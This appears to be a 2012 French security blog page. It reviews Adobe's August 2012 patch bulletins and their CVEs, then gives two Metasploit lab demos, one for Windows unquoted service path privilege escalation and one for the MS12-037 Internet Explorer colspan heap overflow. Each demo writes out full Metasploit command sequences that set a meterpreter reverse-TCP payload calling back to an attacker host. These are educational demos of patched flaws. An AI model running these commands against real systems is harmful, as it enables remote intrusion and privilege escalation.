If you understand french then you can watch our September 2012 Web TV show.
In this episode :
- Defcon
- pirateBox
- Lock Picking
- MegaUpload
- Ethical Hacking learned in french university
- Interview of a french military general specialized into cyber securit
Adobe August 2012 Patch Tuesday Review
Adobe has release, the 14 August 2012, during his August Patch Tuesday, three security bulletins dealing with 26 vulnerabilities. All these security bulletins have a Critical severity rating and 23 of 26 vulnerabilities have a CVSS base score of 10.0.
APSB12-16 – Security update for Adobe Reader and Acrobat
APSB12-16 is concerning Adobe Reader and Acrobat X (10.1.3) and earlier versions for Windows and Macintosh. 20 vulnerabilities have been fixed in these updates, all of them are classified as Critical and allow code execution. 18 of the 20 vulnerabilities have a CVSS base score of 10.0.
CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159 and CVE-2012-4160 have been discovered and privately reported by Mateusz Jurczyk and Gynvael Coldwind, of the Google Security Team. All these vulnerabilities have a CVSS base score of 10.0.
CVE-2012-4147 (CVSS base score of 10.0), CVE-2012-4161 (CVSS base score of 7.5) and CVE-2012-4162 (CVSS base score f 7.5) have been discovered and privately reported by James Quirk.
CVE-2012-2051, with a CVSS base score of 10.0, has been discovered and privately reported by Mateusz Jurczyk of the Google Security Team.
CVE-2012-2049, with a CVSS base score of 10.0, has been discovered and privately reported by Pavel Polischouk of the Vulnerability Research team at TELUS Security Labs.
CVE-2012-2050, with a CVSS base score of 10.0, has been discovered and privately reported by an anonymous contributor working with Beyond Security’s SecuriTeam Secure Disclosure Program.
CVE-2012-4148, with a CVSS score of 10.0, has been discovered and privately reported by John Leitch at Microsoft and Microsoft Vulnerability Research (MSVR).
CVE-2012-1525, with a CVSS score of 10.0, has been discovered and privately reported by Nicolas Grégoire through iDefense’s Vulnerability Contributor Program.
Despite the high number of fixed vulnerabilities, Adobe Reader for Linux has not been updated and they are still known vulnerabilities in the Windows and Macintosh versions. Adobe plan to release an out-of-band update for Adobe Reader for Linux before 27 August.
APSB12-17- Security update for Adobe Shockwave Player
APSB12-17 is concerning Adobe Shockwave Player 11.6.5.635 and earlier versions on the Windows and Macintosh. 5 vulnerabilities have been fixed in these updates, all of them are classified as Critical and allow code execution. All these vulnerabilities have a CVSS base score of 10.0.
CVE-2012-2043, CVE-2012-2046 and CVE-2012-2047 have been discovered and privately reported by Honggang Ren of Fortinet’s FortiGuard Labs. All these vulnerabilities have a CVSS base score of 10.0.
CVE-2012-2045, with a CVSS base score of 10.0, has been discovered and privately reported by Will Dormann of CERT.
CVE-2012-2044, with a CVSS base score of 10.0, has been discovered and privately reported by suto.
APSB12-18 – Security update for Adobe Flash Player
APSB12-18 is concerning Adobe Flash Player 11.3.300.270 and earlier versions for Windows, Macintosh and Linux.
CVE-2012-1535, with a CVSS base score of 9.3, has been discovered exploited in the wild in limited targeted attacks, distributed through a malicious Word document. The exploit targets the ActiveX version of Flash Player for Internet Explorer on Windows. But since the 18 August a Metasploit module is available and doesn’t require to forge a malicious Word document. The Metasploit module is actually focusing on Windows XP SP3 and is still quiet unstable, but you should urgently update your Flash Player.
Windows Service Trusted Path Privilege Escalation Vulnerability Metasploit Demo
Timeline :
Metasploit PoC provided the 2012-08-14
PoC provided by :
sinn3r
Reference(s) :
None
Affected version(s) :
All Microsoft Windows with applications having unexpected paths
Tested on Windows XP Pro SP3 with :
OpenVPN 2.1.1
Description :
This module exploits a logic flaw due to how the lpApplicationName parameter is handled. When the lpApplicationName contains a space, the file name is ambiguous. Take this file path as example: C:\program files\hello.exe; The Windows API will try to interpret this as two possible paths: C:\program.exe, and C:\program files\hello.exe, and then execute all of them. To some software developers, this is an unexpected behavior, which becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, sometimes escalate privileges if run as SYSTEM. Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the same problem. The offensive technique is also described in Writing Secure Code (2nd Edition), Chapter 23, in the section “Calling Processes Security” on page 676.
Commands :
You need a valid session on the target for example with : exploit/windows/browser/ms12_037_same_id Then execute the following exploit to detect vulnerable services use exploit/windows/local/trusted_service_path set SESSION 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 set LPORT 4443 exploit sysinfo getuid
MS12-037 Internet Explorer CVE-2012-1876 Vulnerability Metasploit Demo
Timeline :
Vulnerability discovered by VUPEN Security and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2012-03-14
Public release of the vulnerability the 2012-06-12
Details of the vulnerability provided by VUPEN the 2012-07-10
Metasploit PoC provided the 2012-07-31
PoC provided by :
Alexandre Pelletier
mr_me
binjo
sinn3r
juan vazquez
Reference(s) :
MS12-037
CVE-2012-1876
OSVDB-82866
ZDI-12-093
Affected version(s) :
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9
Tested on Windows XP Pro SP3 with :
Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP
Description :
This module exploits a heap overflow vulnerability in Internet Explorer caused by an incorrect handling of the span attribute for col elements from a fixed table, when they are modified dynamically by javascript code.
Commands :
use exploit/windows/browser/ms12_037_ie_colspan set SRVHOST 192.168.178.100 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid